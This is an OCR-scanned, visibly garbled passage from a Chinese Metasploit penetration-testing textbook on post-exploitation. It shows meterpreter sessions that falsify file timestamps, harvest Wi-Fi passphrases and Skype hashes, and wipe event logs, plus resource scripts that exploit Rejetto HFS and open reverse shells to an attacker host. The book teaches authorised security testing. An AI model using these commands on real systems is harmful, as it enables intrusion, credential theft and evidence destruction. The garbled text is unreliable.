1999-11-26 15:15:25。 下 面 来 看 看 文件 是 否 被 成 功 修改 。 



























































meterpreter > timestomp -v creditcard.txt 


Modified : 1999-11-26 15:15:25 40530 
Accessed : 1999-11-26 15:15:25 40530 
Created : 1999-11-26 15:15:25 40530 


Entry Modified: 1999-11-26 15:15:25 +0530 
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我 们 已 经 使 用 timestomp 命令 成 功 修改 了 creditcard.txt 文件 。 也 可 以 如 下 图 所 示 使 用 参数 -b 将 
一 个 文件 的 所 有 时 间 信 息 清空 。 











meterpreter > timestomp -b creditcard.txt 
[*] Blanking file MACE attributes on creditcard.txt 
meterpreter > timestomp -v creditcard.txt 


Modified : 2106-02-07 11:58:15 +0530 
Accessed : 2106-02-07 11:58:15 +0530 
Created : 2106-02-07 11:58:15 +0530 








Entry Modified: 2106-02-07 11:58:15 +0530 





全 使 用 timestomp 命令 可 以 分 别 修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 。 


8.4 其 他 后 渗透 模块 


Metasploit 提供 了 250 多 个 后 渗透 模块 ， 现 在 只 能 挑选 其 中 一 些 比 较 典 型 的 进行 讲解 ， 其 余 的 模 
块 有 待 你 自己 去 深入 发 掘 。 





























8.4.1 使 用 Metasploit 收集 无 线 SSID 信息 


使 用 wlian_bss_list 模块 可 以 轻松 发 现 目 标 系统 附近 的 无 线 网 络 ， 这 样 就 可 以 对 目标 进行 踩点 
并 收集 更 多 的 重要 信息 ， 如 下 图 所 示 。 


meterpreter > run post/windows/wlan/wlan bss list 



































[*] Number of Networks: 3 
SSID: NJ 


BSSID: e8:de:27:86:be:0a 
Type: Infrastructure 

PHY: Extended rate PHY type 
RSSI: -80 

Signal: 55 





SSID: Venkatesh 
BSSID: e4:6f:13:85:e5:74 
Type: Infrastructure 
PHY: 802.11n PHY type 
RSSI: -78 
Signal: 55 


SSID: F-201 
BSSID: 94:fb:b3:ff:a3:3b 
Type: Infrastructure 
PHY: Extended rate PHY type 
RSSI: -84 
Signal: 5 








[*] WlanAPI Handle Closed Successfully 





8.4.3 ”使 用 Metasploit 收集 Wi-Fi 密码 


跟 上 一 个 模块 类 似 , 使 用 wlan_profile 模块 可 以 收集 目标 系统 上 保存 的 Wi-Fi 登录 凭证 。 可 以 
如 下 图 所 示 使 用 这 个 模块 。 
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在 上 





meterpreter > run post/windows/wlan/wlan profile 


Wireless LAN Profile Information 
GUID: (fflc4d5c-a147-41d2-91ab-5f9dlbeeedfa) Description: Realtek RTL8723BE Wire 
less LAN 802.11n PCI-E NIC State: The interface is connected to a network. 
Profile Name: ThePaandu 
«?xml versionz"1.0"?» 
«WLANProfile xmlns-"http://www.microsoft.com/networking/WLAN/profile/v1"» 
*name»ThePaanduc/name» 
«SSIDConfig» 
«SSID» 
*hex25468655061616E6475«/hex» 
«name»ThePaandu«c/name» 
«/SSID» 
«/SSIDConfig» 
«connectionType»ESS«/connectionType» 
«connectionMode»autoc/connectionMode» 
«Msn 
«security» 
«authEncryption» 
«authentication»WPA2PSK«/authentication» 
«encryption»AES«/encryption» 
<use0neX>faLse</use0neX> 
</authEncryption> 
<sharedKey> 
<keyType>passPhrase</keyType> 
<protected>false</protected> 
<keyMate ria EE keyMaterial» 
«/sharedKey» 
«/security» 
</MSM> 
«MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profil 


e/v3"> 














到 的 <name> 标 签 中 可 以 找到 网 络 的 名 字 ， 在 <keyMaterial> 中 可 以 找到 登录 网 络 的 密码 。 





8.4.3 ”获取 应 用 程序 列表 


Metasploit 中 内 置 了 对 各 种 应 用 程序 的 登录 凭证 采集 器 。 不 过 为 了 了 解 目标 系统 上 都 安装 了 哪些 
程序 ， 需 要 使 用 get_application_list 模块 获取 应 用 程序 列表 ， 如 下 图 所 示 。 

























































































meterpreter > run get_appLication_List 


DEM Applications 








Name Version 
Tools for .Net 3.5 3.11.50727 
ActivePerl 5.16.2 Build 1602 5.16.1602 
Acunetix Web Vulnerability Scanner 10.0 10.0 

Adobe Flash Player 22 NPAPI 22.0.0.192 
Adobe Reader XI (11.0.16) 11.0.16 
Adobe Refresh Manager 1.8.0 

Apple Application Support (32-bit) 4.1.2 
Application Insights Tools for Visual Studio 2013 2.4 

Arduino 1.6.8 
AzureTools.Notifications 2.1.10731.1602 
Behaviors SDK (Windows Phone) for Visual Studio 2013 12.0.50716.0 
Behaviors SDK (Windows) for Visual Studio 2013 12.0.50429.0 
Blend for Visual Studio 2013 12.0.41002.1 
Blend for Visual Studio 2013 ENU resources 12.0.41002.1 
Blend for Visual Studio SDK for .NET 4.5 3.0.40218.0 
Blend for Visual Studio SDK for Silverlight 5 3.0.40218.0 
Build Tools - x86 12.0.31101 
Build Tools Language Resources - x86 12.0.31101 


Color Cop 5.4.3 
DatPlot version 1.4.8 1.4.8 
Don Bradman Cricket 14 





Driver Booster 3.2 3.2 

Dropbox 5.4.24 
Dropbox Update Helper 1.3.27.77 
Entity Framework 6.1.1 Tools for Visual Studio 2013 12.0.30610.0 











找到 所 有 的 应 用 程序 之 后 ， 就 可 以 在 目标 系统 上 运行 各 种 采集 模块 了 。 
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8.4.4 获取 Skype 密码 





假设 我 们 发 现 目标 系统 上 运行 着 Skype， 用 Metasploit 中 的 Skype 模块 就 可 以 获取 Skype 的 密码 。 





meterpreter > run post/windows/gather/credentials/skype 
[*] Checking for encrypted salt in the registry 


Salt found and decrypted 
[*] Checking for config files in %APPDATA% 


Found Config.xml in C:\Users\Apex\AppData\Roaming\Skype\nipun.jaswal88\ 
Found Config.xml in C:\Users\Apex\AppData\Roaming\Skype 

[*] Parsing C:\Users\Apex\AppData\Roaminq\Skype\nipun. jaswal onfig.xm 
Skype MD5 found: nipun.jaswal88:6d8d 43 


Metasploit 包含 了 一 个 恢复 USB 使 用 历史 的 模块 ， 通 过 它 可 以 查看 在 目标 系统 中 都 使 用 过 哪些 
USB 设备 。 当 目标 系统 中 采用 了 USB 限制 措施 ， 只 有 特定 的 USB 设备 才 允 许 连接 的 情况 下 ， 这 个 模 
块 就 非常 有 用 了 一 一 利用 这 个 模块 可 以 轻松 地 伪造 USB 描述 符 和 硬件 ID。 



































有 关 伪 造 USB 描述 符 和 绕 过 端点 保护 的 更 多 信息 ， 请 访问 http:/www.slideshare.net/ 
the_netlocksmith/defcon-2012-hacking-using-usb-devices。 


下 面 来 看 看 如 何 使 用 这 个 模块 。 


meterpreter > run post/windows/gather/usb_history 

















[*] Running module against DESKTOP-PESQ21S 
[*] 


H: Disk 4f494d44 
G: Disk 3f005f 

I:  SCSI£CdRom&Ven Hsft&Prod Virtual DVD-ROMZ2&lf4adffe&0&0000014(5315630d-b6bf - 11d0 -94 
If2-00a0c91efb8b) 


[*] Patriot Memory USB Device 





Disk lpftLastWriteTime Unknown 
Manufacturer @disk. inf ,%genmanufacturer%; (Standard disk drives) 

Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318) 0005 


[*] SanDisk Cruzer Blade USB Device 


Disk lpftLastWriteTime Unknown 
Manufacturer Gdisk.inf,*;genmanufacturer*;; (Standard disk drives) 

Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318) 0002 


[*] UFD 3.0 Silicon-Power64G USB Device 








Disk lpftLastWriteTime Unknown 
Manufacturer @disk. inf ,%genmanufacturer%; (Standard disk drives) 

Class 
Driver (4d36e967 -e325 -11ce-bfc1-08002be10318)^0003 





8.4.6 使 用 Metasploit 查找 文件 


Metasploit 提供 了 一 个 非常 酷 的 文件 查找 命令 ， 利 用 它 可 以 找到 你 感 兴趣 的 文件 ， 甚 至 还 可 以 下 载 
这 些 文件 。 使 用 search 命令 可 以 列 出 所 有 具有 特殊 扩展 名 的 文件 ， 比 如 *.doc、*.xls 等 ， 如 下 图 所 示 。 
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meterpreter > search -f *.doc 
Found 162 results... 

c:\Program Files (x86) Microsoft OfficeV0ffice12V1033VPROTTPLN.DOC (19968 bytes) 

c:\Program Files (x86)\Microsoft OfficeV0fficel2V1033VPROTTPLV.DOC (19968 bytes) 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7NIDE VP rojectTemplatesVCSharp| 
NOfficeMAddins V 1033 VSTOWordl5DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0VCommon7MIDE VP rojectTemplatesVCSharp| 
NOfficeMAddins V 1033 VVSTOWord2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7NIDE VP rojectTemplates Visual, 
Basic VOfficeMAddins V 1033 VVSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0VCommon7MIDE VP rojectTemplates V Visual| 
Basic V0fficeMAddins V 1033 V VSTOWord2010DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0VCommon7NIDE VP rojectTemplatesCacheVC 
Sharp X 0f f ice MAddins M 1033 NVSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0XCommon7 VIDE VP rojectTemplatesCacheAXC| 
SharpX Of ficeMAddins V 1033 V VSTOWord20 10DocumentV4NEmpty . doc 

c:\Program Files (x86)\Microsoft Visual Studio 12.0VCommon7NIDE VP rojectTemplatesCache VV 
isualBasicV0fficeMAddins M 1033 V VSTOWord15DocumentV4NEmpty . doc 

c:\Program Files (x86) Microsoft Visual Studio 12.0NCommon7MIDE VP rojectTemplatesCache WV| 
isualBasicV0fficeMAddins V 1033 V VSTOWord20 10DocumentV4NEmpty . doc 

c:\Program Files (x86)\Microsoft Visual Studio 12.0 V VBXSpecifications M 1033 V Visual Basic 
Language Specification.docx (683612 bytes) 

c:\Program Files (x86) Microsoft Visual Studio 12.0 NVC£ASpecificationsV 1033 XCSharp Lang| 
uage Specification.docx (791626 bytes) 

c:\Program Files (x86) MResumeMaker Professional DATANFederalVFederal Forms Listing.doc 
(30720 bytes) 











8.4. ”使 用 clearev 命令 清除 目标 系统 上 的 日 志 
可 以 使 用 clearev 命令 清除 目标 系统 上 的 所 有 日 志文 件 。 


meterpreter > clearev 

[*] Wiping 13075 records from Application... 
[*] Wiping 16155 records from System... 

[*] Wiping 26212 records from Security... 


不 过 除非 是 执法 部 门 ， 和 否则 你 不 应 该 从 目标 系统 上 删除 日 志 ， 因 为 这 些 日 志 可 以 向 蓝 队 提 供 大 量 
有 用 的 信息 供 其 加 固 防 御 措 施 。Metasploit 中 另 一 个 用 来 处 理 日 志 的 模块 就 是 event, manager, 使 用 
方法 如 下 图 所 示 。 
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meterpreter > run event_manager -i 

[*] Retriving Event Log Configuration 

Event Logs on System 
Name Retention Maximum Size Records 
Application Disabled 20971520K 6 
Cobra Disabled 524288K 51 
HardwareEvents Disabled 20971520K 0 
Internet Explorer Disabled K 0 
Key Management Service Disabled 20971520K 0 
OAlerts Disabled 131072K 34 
0Diag Disabled 16777216K 0 
0Session Disabled 16777216K 426 
PreEmptive Disabled K 0 
Security Disabled 20971520K 3 
System Disabled 20971520K 1 
Windows PowerShell Disabled 15728640K 169 














下 一 节 将 会 讲解 Metasploit 中 的 高 级 扩展 功能 。 


8.5 Metasploit 中 的 高 级 扩展 功能 
本 章 涵盖 大 量 后 渗透 模块 ， 现 在 先 来 介绍 Metasploit 中 的 一 些 高 级 渗透 功能 。 
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8.5.1 


pushm 和 popm 命令 的 使 用 方法 











Metasploit 中 提供 了 两 个 功能 极为 强大 的 命令 : pushm 和 popm。 使 用 pushm 命令 可 以 将 当前 模 


块 放 入 模块 栈 
































， 而 popm 命令 可 以 将 位 于 栈 顶 部 的 模块 弹出 。 不 过 这 并 不 是 可 以 用 于 进程 的 标准 栈 ， 


而 是 Metasploit 中 一 个 概念 相同 的 工具 一 一 它们 并 不 相同 。 使 用 这 些 命令 的 优势 在 于 可 以 实现 快捷 操 
作 ， 从 而 为 测试 者 节省 大 量 的 时 间 和 精力 。 








下 面 来 考虑 一 个 场景 : 我 们 正在 测试 一 台 有 多 种 漏洞 的 内 部 网 络 的 服务 器 ， 而 且 要 对 内 部 网 络 





























的 所 有 系统 都 进行 两 种 不 同 的 渗透 测试 。 为 了 能 对 每 台 服 务 器 都 进行 这 两 种 测试 ,我们 就 需要 一 种 能 


























另 一 个 渗透 模块 。 使 用 第 二 个 模块 完成 任务 之 后 ， 就 可 以 使 
前 的 所 有 选项 设置 ) 从 栈 中 弹出 。 














下 图 来 了 解 更 多 内 容 。 

















Imsf exploit(psexec) > pushm 

Imsf exploit(psexec) > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

msf exploit(handler) > set LHOST 192.168.10.112 


从 上 


LHOST => 192.168.10.112 

Imsf exploit(handler) > set LPORT 8080 
LPORT => 8080 

Imsf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:8080 


[*] Starting the payload handler... 











handler 


























块 ， 如 下 


从 模块 栈 








到 所 示 。 














Imsf exploit(handler) > popm 
msf exploit(psexec) > show options 


Module options (exploit/windows/smb/psexec): 


Name Current Setting 
Required Description 


RHOST 192.168.10.109 

yes The target address 
RPORT 445 

yes Set the SMB service port 


SERVICE DESCRIPTION 


no 
d on target for pretty listing 
SERVICE DISPLAY NAME 


no The service display name 
SERVICE NAME 
no The service name 
SHARE Administrator$ 
The share to connect to, can be 
an admin share (ADMIN$,C$,...) or a normal read/write folder share 
SMBDomain 
no The Windows domain to use for au 
'thentication 
SMBPass aad3b435b51404eeaad3b435b51404ee: 01c714f17| 
1b670ce8171912d07812470 no The password for the specified u| 


sername 


Service description to to be use 








在 这 两 个 渗透 模块 之 间 快 速 切换 的 机 制 。 在 这 种 情况 下 就 可 以 使 用 pushm 和 popm 命令 。 我 们 可 以 使 
用 一 个 渗透 模块 对 服务 器 的 某 个 漏洞 进行 测试 ， 然 后 将 这 个 模块 放 和 人 模块 栈 中 ,操作 完成 之 后 再 载 人 
用 popm 命令 将 第 一 个 模块 〈 仍然 保持 之 














到 可 以 看 出 , 我 们 已 经 使 用 pushim 命令 将 psexec 模块 放 人 栈 中 , 并 加 载 了 exoloit/multi/ 


模块 。 当 使 用 handler 完成 操作 之 后 ， 就 可 以 使 用 popm 命令 从 栈 中 再 次 加 载 psexec 模 

















P 弹 出 的 psexec 跟 之 前 的 设置 一 样 ， 所 以 无 须 再 设置 这 个 模块 的 选项 了 。 
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8.5.2 使 用 reload、edit Jl reload all 命令 加 快 开 发 过 程 


在 模块 的 开发 阶段 ， 我 们 可 能 需要 对 它 进行 一 次 又 一 次 的 测试 。 每 次 修改 新 模块 时 都 要 关闭 
Metasploit， 这 不 仅 十 分 耗 时 还 让 人 觉得 厌烦 。 因 此 必须 有 一 种 能 让 Metasploit 模块 开发 变 得 简单 、 快 
速 而 有 趣 的 机 制 。 所 幸 Metasploit 提供 了 有 具备 类 似 功能 的 reload, edit fll reload all 命令 , 使 模 
块 的 开发 过 程 变 得 轻松 了 许多 。 我 们 可 以 使 用 edit 命令 动态 修改 Metasploit 中 的 模块 ， 并 在 不 关闭 
Metasploit 的 情况 下 使 用 reload 命令 重新 载 人 编辑 过 的 模块 。 如 果 对 多 个 模块 进行 了 修改 ， 就 可 以 
在 Metasploit 中 使 用 reload_all 命令 一 次 性 载 人 所 有 模块 。 


下 面 来 看 一 个 示例 。 

































































'Payload* => 
{ 
' Space ' => 448] 
'DisableNops ' => true, 
'BadChars ' => "Ax00Xx0aXxOd", 


'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment £ add esp, -3500 
}, 
在 上 面 的 截图 中 ， 我 们 输入 了 edit fm, XJ exploit/windows/ftp 文件 夹 下 的 freefloatftp_user.rb 
渗透 脚本 进行 了 修改 。 我 们 将 攻击 载荷 的 大 小 从 444 修改 为 448， 然 后 保存 了 这 个 脚本 。 接 下 来 只 需 
要 输入 reload 命令 ,更 新 Metasploit 模块 的 源 代 码 即 可 ， 这 个 过 程 如 下 图 所 示 。 


msf exploit(freefloatftp user) > edit 

*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/ftp/freefloatftp user.rb 
sf exploit(freefloatftp user) » reload 

[*] Reloading module... 

msf exploit(freefloatftp user) > Bi 


使 用 reload 命令 就 无 须 在 启用 新 模块 时 重新 启动 Metasploit T - 









































E e 






































Æ Metasploit 中 使 用 edit 命令 将 会 启用 VI 编 辑 器 对 模块 进行 编辑 。 有 关 VI 编辑 器 


的 更 多 信息 ， 请 访问 http:/www.tutorialspoint.com/unix/unix-vi-editor.htm。 


8.5.3 ”资源 脚本 的 使 用 方法 

Metasploit 可 以 通过 资源 脚本 实现 自动 化 。 使 用 资源 脚本 可 以 免 去 手动 设置 选项 ， 实 现 选项 的 自 
动 化 设置 ， 从 而 节省 了 配置 模块 选项 和 攻击 载荷 所 需 的 时 间 。 

创建 资源 脚本 有 两 种 方法 : 手动 创建 脚本 或 使 用 makerc 命令 创建 脚本 。 我 个 人 比较 偏向 使 
makerc 命令 ， 因 为 这 样 可 以 避免 输入 错误 。makerc 命令 将 之 前 输入 过 的 所 有 命令 都 保存 到 了 一 个 
文件 中 ， 可 以 使 用 resource 命令 来 使 用 这 个 文件 。 下 图 中 给 出 了 一 个 示例 。 
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msf > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 

payload => windows/meterpreter/reverse tcp 

msf exploit(handler) > set LHOST 

set LHOST 192.168.10.112 set LHOST fe80::a00:27ff:fe55:fcfa'sethü 
msf exploit(handler) > set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

msf exploit(handler) > set LPORT 4444 

LPORT => 4444 

msf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:4444 
[*] Starting the payload handler... 

^C[-] Exploit failed: Interrupt 

[*] Exploit completed, but no session was created. 

msf exploit(handler) > makerc 

Usage: makerc «output rc file» 


Save the commands executed since startup to the specified file. 


msf exploit(handler) > makerc multi hand 
[*] Saving last 6 commands to multi hand ... 


由 上 图 可 知 ， 我 们 通过 设置 攻击 载荷 和 各 种 选项 (例如 LHOST 和 LPORT ) 成 功 启动 了 一 个 渗透 
模块 handler。 输 入 makerc 命令 就 可 以 将 这 些 命令 保存 到 一 个 指定 的 文件 中 ， 在 这 个 例子 中 是 
multi hand 文件 。 我 们 保存 了 最 近 使 用 的 6 条 命令 。 下 面 如 下 图 所 示 使 用 这 个 资源 脚本 。 


msf > resource multi hand 

[*] Processing multi hand for ERB directives. 

resource (multi hand)» use exploit/multi/handler 

resource (multi hand)» set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

resource (multi hand)» set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

resource (multi hand)» set LPORT 4444 

LPORT => 4444 

resource (multi hand)» exploit 












































Tr 

















[*] Started reverse TCP handler on 192.168.10.112:4444 
[*] Starting the payload handler... 




















输入 resource 命令 和 脚本 的 名 字 就 可 以 自动 粘贴 脚本 中 保存 的 命令 , 从 而 避免 对 选项 进行 重复 
设置 。 











8.5.4 在 Metasploit 中 使 用 AutoRunSczript 


Metasploit 还 提供 了 十 分 强大 的 AutoRunscript TH, 可 以 通过 输入 show advanced 命令 查看 
AutoRunScript 的 选项 。aAutoRunScript 可 以 实现 自动 化 的 后 渗透 测试 , 一 旦 获得 目标 的 控制 权限 
就 开始 执行 。 我 们 可 以 通过 输入 set AutoRunScript [script-name] 来 设置 AutoRunScript 的 选 
项 ， 也 可 以 在 资源 脚本 中 直接 设置 ， 后 者 可 以 一 次 性 自动 完成 渗透 操作 和 后 渗透 操作 。 通 过 使 用 
multi script 和 multi_console_command 模块 ,AutoRunScript 还 可 以 一 次 运行 多 个 后 渗透 脚 
本 。 下 面 来 看 一 个 使 用 了 两 个 脚本 的 示例 ， 一 个 用 于 自动 化 的 渗透 测试 ， 另 一 个 用 于 自动 化 的 后 渗透 
测试 ， 如 下 图 所 示 。 

































































GNU nano 2.2.6 File: multi script 





run post/windows/gather/checkvm 
run post/windows/manage/migrate 
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上 面 给 出 的 是 一 个 实现 了 checkvm ( 检查 目标 系统 是 否 运行 在 虚拟 环境 中 的 模块 ) 和 migrate 
(将 攻击 载荷 迁移 到 安全 进程 的 模块 ) 模块 自动 化 的 后 渗透 脚本 ， 这 个 脚本 十 分 小 巧 。 下 面 看 看 这 个 
渗透 测试 脚本 的 内 容 。 








GNU nano 2. Fil resource complete 





fse exploit/windows/http/rejetto hfs exec 

set payload windows/meterpreter/reverse tcp 

set RHOST 192.168.10.109 

set RPORT 8081 

set LHOST 192.168.10.112 

set LPORT 2222 

set AutoRunScript multi console command -rc /root/my scripts/multi script 
exploit 

















上 面 的 资源 脚本 设置 了 对 HFS 文件 服务 器 进行 渗透 所 必需 的 所 有 参数 ， 并 实现 了 攻击 的 自动 化 。 
我 们 还 使 用 multi console command 对 AutoRunScript 进行 了 设置 ， 并 将 multi console command 


设 定 为 -rc， 这 样 就 允许 执行 多 个 后 渗透 脚本 了 。 这 个 过 程 如 同上 图 所 示 。 
接 下 来 运行 渗透 测试 的 脚本 ， 并 分 析 它 的 执行 结果 。 


























Imsf > resource /root/my scripts/resource complete 

[*] Processing /root/my scripts/resource complete for ERB directives 

resource (/root/my scripts/resource complete)» use exploit/windows/http/rejetto hfs exec 
resource (/root/my scripts/resource complete)» set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

resource (/root/my scripts/resource complete)» set RHOST 192.168.10.109 

RHOST => 192.168.10.109 

resource (/root/my scripts/resource complete)» set RPORT 8081 

RPORT => 8081 

resource (/root/my scripts/resource complete)» set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

resource (/root/my_scripts/resource complete)> set LPORT 2222 

LPORT => 2222 

resource (/root/my_scripts/resource complete)> set AutoRunScript multi console command -rc /root/my_scripts/multi script 
AutoRunScript => multi console command -rc /root/my_scripts/multi script 

resource (/root/my scripts/resource complete)» exploit 


] Started reverse TCP handler on 192.168.10.112:2222 
] Using URL: http: //0.0.0.0:8080/SP6WO8sSPhH 
] Local IP: http://192.168.10.112:8080/SP6W08sSPhH 
] Server started. 
] Sending a malicious request to / 
] Sending stage (957487 bytes) to 192.168.10.109 
] 192.168.10.109 rejetto hfs exec - 192.168.10.109:8081 - Payload request received: /SP6W08sSPhH 
] Meterpreter session 1 opened (192.168.10.112:2222 -» 192.168.10.109:49217) at 2016-07-11 00:42:05 40530 
Tried to delete STEMP*XpRizJBaJheeoPB.vbs, unknown result 
Sending stage (957487 bytes) to 192.168.10.109 
Session ID 1 (192.168.10.112:2222 -> 192.168.10.109:49217) processing AutoRunScript 'multi console command -rc /root/my scripts/multi script' 
Meterpreter session 2 opened (192.168.10.112:2222 -» 192.168.10.109:49222) at 2016-07-11 00:42:07 40530 
Running Command List ... 
Running command run post/windows/gather/checkvm 
Checking if WIN-SWIKKOTKSHX is a Virtual Machine ..... 
Session ID 2 (192.168.10.112:2222 -> 192.168.10.109:49222) processing AutoRunScript 'multi console command -rc /root/my scripts/multi script' 
Running Command List ... 
Running command run post/windows/gather/checkvm 
This is a Sun VirtualBox Virtual Machine 
Running command run post/windows/manage/migrate 
Checking if WIN-SWIKKOTKSHX is a Virtual Machine ..... 
Running module against WIN-SWIKKOTKSHX 
Current server process: notepad.exe (3316) 
Spawning notepad.exe process to migrate to 
This is a Sun VirtualBox Virtual Machine 
Running command run post/windows/manage/migrate 
Migrating to 2964 
[*] Server stopped 


imeterpreter > 

[*] Running module against WIN-SWIKKOTKSHX 

[*] Current server process: UNJxwKFkUTU.exe (2940) 
[*] Spawning notepad.exe process to migrate to 
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当 渗透 测试 结束 时 ， 

















我 们 获得 了 如 上 图 所 示 的 结果 : checkvm M migrate 两 个 模块 都 已 经 成 功 


执行 , 而 且 目 标 运 行 在 Sun 公司 的 VirtualBox 虚拟 机 上 ,控制 程序 也 已 经 迁移 到 notepad.exe 进程 中 。 
脚本 成 功 运行 之 后 ， 就 可 以 看 到 如 下 输出 。 








meterpreter > 

[*] Running module against WIN-SWIKKOTKSHX 

[*] Current server process: UNJxwKFkUTU.exe (2940) 

[*1 Spawning notepad.exe process to migrate to 
Migrating to 3120 
Successfully migrated to process 2964 
Successfully migrated to process 3120 

















我 们 已 经 成 功 将 控制 程序 迁移 到 了 notepad.exe 进程 上 。 不 过 如 果 notepad.exe 有 多 个 运行 的 实例 ， 
还 可 以 将 其 迁移 到 其 他 进程 上 。 














8.5.5 使 用 AutoRunScript 选项 中 的 multiscript 模块 














可 以 使 用 multiscript 模块 代替 multi_console_command 模 块 , 我 们 来 创建 一 个 后 渗透 脚本 ， 


如 下 图 所 示 。 




















GNU nano 2.2.6 File: multi scr.rc 


checkvm 

migrate -n explorer.exe 
get env 

event manager -i 








从 上 图 可 以 看 出 , 我 们 已 经 成 功 创建 了 一 个 名 为 multi_scrrc 的 后 渗透 脚本 。 现 在 对 这 个 后 渗透 脚 











本 做 些 修改 ,修改 后 的 用 


本 如 下 图 所 示 。 


GNU nano 2.2.6 File: resource complete 


Bet RHO: 
Bet RPO! 
Bet LHO: 
Bet LPO 
Bet Aut 
exploit 





use exploit/windows/http/rejetto hfs exec 
Bet payload windows/meterpreter/reverse tcp 


ST 192.168.10.109 
RT 8081 
ST 192.168.10.105 
RT 2222 


oRunScript multiscript -rc /root/my scripts/multi scr.rc 


























如 上 图 所 示 ， 只 需 使 














jmultiscript 替换 multi_console_command， 然后 更 新 后 渗透 脚本 的 





路 径 即 可 。 下 面 来 看 看 执行 这 个 后 渗透 脚本 会 发 生 什么 。 
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Imsf > resource /root/my_scripts/resource_complete 

[*] Processing /root/my scripts/resource complete for ERB directives. 

resource (/root/my scripts/resource complete)» use exploit/windows/http/rejetto hfs e 
xec 

resource (/root/my scripts/resource complete)» set payload windows/meterpreter/revers 
le tcp 

payload => windows/meterpreter/reverse tcp 

resource (/root/my scripts/resource complete)» set RHOST 192.168.10.109 

RHOST => 192.168.10.109 

resource (/root/my_scripts/resource_complete)> set RPORT 8081 

RPORT => 8081 

resource (/root/my_scripts/resource_complete)> set LHOST 192.168.10.105 

LHOST => 192.168.10.105 

resource (/root/my_scripts/resource_complete)> set LPORT 2222 

LPORT => 2222 

resource (/root/my_scripts/resource_complete)> set AutoRunScript multiscript -rc /roo 
[t/my scripts/multi scr.rc 

MutoRunScript => multiscript -rc /root/my scripts/multi scr.rc 

resource (/root/my scripts/resource complete)» exploit 


[*] Started reverse TCP handler on 192.168.10.105:2222 
[*] Using URL: http://0.0.0.0:8080/e1kYsP 
[*] Local IP: http://192.168.10.105:8080/e1kYsP 
[*] Server started. 
[*] Sending a malicious request to / 
[*] 192.168.10.109 rejetto hfs exec - 192.168.10.109:8081 - Payload request receive 
d: /elkYsP 
[*] Sending stage (957487 bytes) to 192.168.10.109 
[*] Meterpreter session 7 opened (192.168.10.105:2222 -» 192.168.10.109:49273) at 201 
6-07-11 13:16:01 «0530 
Tried to delete *;STEMP*AIlMpSDXbuGy.vbs, unknown result 
[*] Session ID 7 (192.168.10.105:2222 -» 192.168.10.109:49273) processing AutoRunScri 
pt 'multiscript -rc /root/my scripts/multi scr.rc' 
[*] Running Multiscript script..... 
[*] Running script List ... 
[*1 running script checkvm 
[*] Checking if target is a Virtual Machine ..... 
[*] This is a Sun VirtualBox Virtual Machine 
[*] running script migrate -n expLorer.exe 
[*] Current server process: egmvsHerJGkWWt.exe (2476) 
Migrating to 3568 


当 我 们 获得 目标 系统 的 控制 权限 之 后 ，checkvm 模块 就 会 开始 执行 ， 之 后 migrate. get env 
fil event. manager 命令 依次 执行 ， 如 下 图 所 示 。 























meterpreter > SuccessfuLLy migrated to process 
[*] running script get_env 


[*] Getting all System and User Variables 


Enviroment Variable list 





Name Value 

APPDATA C: \Users\mm\AppData\Roaming 
ComSpec C:\Windows\system32\cmd.exe 
FP_NO_HOST_CHECK NO 

HOMEDRIVE C: 

HOMEPATH \Users\mm 

LOCALAPPDATA C:\Users\mm\AppData\Local 
LOGONSERVER \\WIN-SWIKKOTKSHX 

NUMBER OF PROCESSORS 1 

os Windows_NT 

PATHEXT .COM; .EXE; .BAT; . CMD; . VBS; . VBE; . JS; . JSE; .WSF; .WSH; . MSC 


PROCESSOR_ARCHITECTURE x86 
PROCESSOR_IDENTIFIER x86 Family 6 Model 60 Stepping 3, GenuineIntel 


PROCESSOR_LEVEL 6 

PROCESSOR_REVISION 3c03 

Path C: \Windows\system32; C: Windows ; C: \Windows\System32\Wbem; C : NW 
indowsVSystem32WindowsPowerShellWvl.0V 

TEMP C:\Users\mm\AppData\Local\Temp\1 
TMP C:\Users\mm\AppData\Local\Temp\1 
USERDOMAIN WIN-SWIKKOTKSHX 

USERNAME mm 

USERPROFILE C:\Users\mm 

windir C:\Windows 

[*] running script event_manager -i 

[*] Retriving Event Log Configuration 


Event Logs on System 





Name Retention Maximum Size Records 
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在 资源 脚本 中 使 用 event manager 模块 和 参数 -i 可 以 查看 





令 


的 结果 如 下 图 所 示 。 


event manager fi 





目标 系统 上 的 所 有 上 日志。 执行 








running script event manager -i 


*] Retriving Event Log Configuration 


[*] 
[*] 


Event Logs on System 





Name Retention Maximum Size Records 
Application Disabled 20971520K 130 
HardwareEvents Disabled 20971520K 0 

Internet Explorer Disabled K 0 

Key Management Service Disabled 20971520K 0 

Security Disabled K Access Denied 
System Disabled 20971520K 1212 

Windows PowerShell Disabled 15728640K 200 








8.5.6 FH Metasploit 提升 权限 


在 渗透 测试 的 过 程 中 ， 
如 下 的 错误 。 


经 常会 遇 


到 访问 受 限 的 情况 ,例如 在 运行 nasndump 命令 时 ,可 


能 会 过 到 





meterpreter > hashdump 


[-] priv passwd get sam hashes: Operation failed: The parameter is incorrect. 























在 这 种 情况 下 ， 如 果 试 图 使 朋 














